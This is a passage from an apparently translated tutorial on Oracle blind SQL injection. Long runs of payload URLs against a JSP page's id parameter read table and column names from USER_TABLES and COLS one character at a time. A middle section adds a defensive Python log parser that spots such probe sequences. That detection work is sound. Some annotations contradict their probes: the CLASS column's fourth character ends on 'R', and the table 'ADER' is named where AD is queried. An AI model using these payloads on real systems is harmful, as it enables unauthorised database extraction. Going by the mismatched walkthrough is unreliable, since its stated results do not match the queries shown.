www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

The following determines that the fourth character of the second table, ADER, is R:

www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 80=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

The following determines the name length of the third table:

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)
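
Each request in steps 1 and 2 above is one boolean probe: the page either renders normally or it does not, and the tool narrows the ASCII value of a single character at a single position with every request. That pattern, rather than any one request, is what a defender has to recognise, because no individual line carries a UNION or a file read. The following Python is an added example, not cnsafersi or the article's own code; it parses constructed Common Log Format lines (addresses and timestamps are invented, the query strings follow the shape of the captures above), extracts every ascii(substr(...)) comparison, and groups the probes by client, endpoint and probed expression so that a run of comparisons against one position, or a walk across positions, stands out. The min_probes threshold is an assumed tuning value.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log: five probes from one client against the same endpoint
# (three candidate values for position 1, two for position 2) and one benign request.
SAMPLE_LOG = """\
203.0.113.8 - - [15/Feb/2023:15:03:20 +0000] "GET /index_kaoyan_view.jsp?id=117%20And%2052=ascii(substr((SELECT%20COUNT%20(*)%20FROM%20USER_TABLES),1,1)) HTTP/1.1" 200 5120
203.0.113.8 - - [15/Feb/2023:15:03:21 +0000] "GET /index_kaoyan_view.jsp?id=117%20And%2052>ascii(substr((SELECT%20COUNT%20(*)%20FROM%20USER_TABLES),1,1)) HTTP/1.1" 200 5120
203.0.113.8 - - [15/Feb/2023:15:03:22 +0000] "GET /index_kaoyan_view.jsp?id=117%20And%2049=ascii(substr((SELECT%20COUNT%20(*)%20FROM%20USER_TABLES),1,1)) HTTP/1.1" 200 5120
203.0.113.8 - - [15/Feb/2023:15:03:23 +0000] "GET /index_kaoyan_view.jsp?id=117%20And%2049=ascii(substr((SELECT%20COUNT%20(*)%20FROM%20USER_TABLES),2,1)) HTTP/1.1" 200 5120
203.0.113.8 - - [15/Feb/2023:15:03:24 +0000] "GET /index_kaoyan_view.jsp?id=117%20And%2095=ascii(substr((SELECT%20COUNT%20(*)%20FROM%20USER_TABLES),2,1)) HTTP/1.1" 200 5120
198.51.100.3 - - [15/Feb/2023:15:04:10 +0000] "GET /index_kaoyan_view.jsp?id=118 HTTP/1.1" 200 5098
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# One character probe: <number> <comparison> ascii(substr(<expression>, <position>, 1))
PROBE_RE = re.compile(
    r"(\d+)\s*(>=|<=|=|>|<)\s*ascii\s*\(\s*substr\s*\(\s*(.+?)\s*,\s*(\d+)\s*,\s*1\s*\)\s*\)",
    re.IGNORECASE,
)


def parse_probes(log_text):
    """Extract every ascii(substr(...)) comparison found in the query strings of a log."""
    probes = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, uri, status = m.groups()
        path, _, query = uri.partition("?")
        query = " ".join(unquote_plus(query).split())
        for pm in PROBE_RE.finditer(query):
            value, op, expr, pos = pm.groups()
            probes.append({"ip": ip, "path": path, "status": int(status),
                           "expr": " ".join(expr.lower().split()),
                           "position": int(pos), "op": op, "value": int(value)})
    return probes


def summarize(probes, min_probes=3):
    """Group probes by (client, endpoint, probed expression). A client that compares
    several candidate values against one position, or walks across positions, is
    enumerating a value one character at a time; report those groups."""
    buckets = defaultdict(lambda: defaultdict(int))
    for p in probes:
        buckets[(p["ip"], p["path"], p["expr"])][p["position"]] += 1
    findings = []
    for (ip, path, expr), positions in sorted(buckets.items()):
        total = sum(positions.values())
        if total >= min_probes or len(positions) >= 2:
            findings.append({"ip": ip, "path": path, "expr": expr,
                             "positions": dict(positions), "probes": total})
    return findings


if __name__ == "__main__":
    for f in summarize(parse_probes(SAMPLE_LOG)):
        print(f["ip"], f["path"], f["expr"], f["positions"], f["probes"])
```

The grouped view also tells the responder what was being read: the expression field names the subquery (here the table count from USER_TABLES), and the positions dictionary shows how far the enumeration had progressed when it was spotted. The same grouping applies to the nvl(length(...)) length probes that open each step; only the regular expression would need a second alternative.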

3. Guess the column-name length and the column names:

a) The following guesses the field length: 2 digits

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

Column-name length: 10 or more

The following guesses the first digit of the column-name length: 1 (tens)

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

The following guesses the second digit of the column-name length: 0 (units)

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 50>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 48=ascii(substr((SELECT COUNT(*) FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

The following guesses that the first field name of the first column, CLASS, has length 5:

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 7>nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 5=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

The following guesses the first character of the first column name, which is C:

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 66=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 66>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

The following guesses the second character of the first column name, which is L:

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

The following guesses the third character of the first column name, which is A:

www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

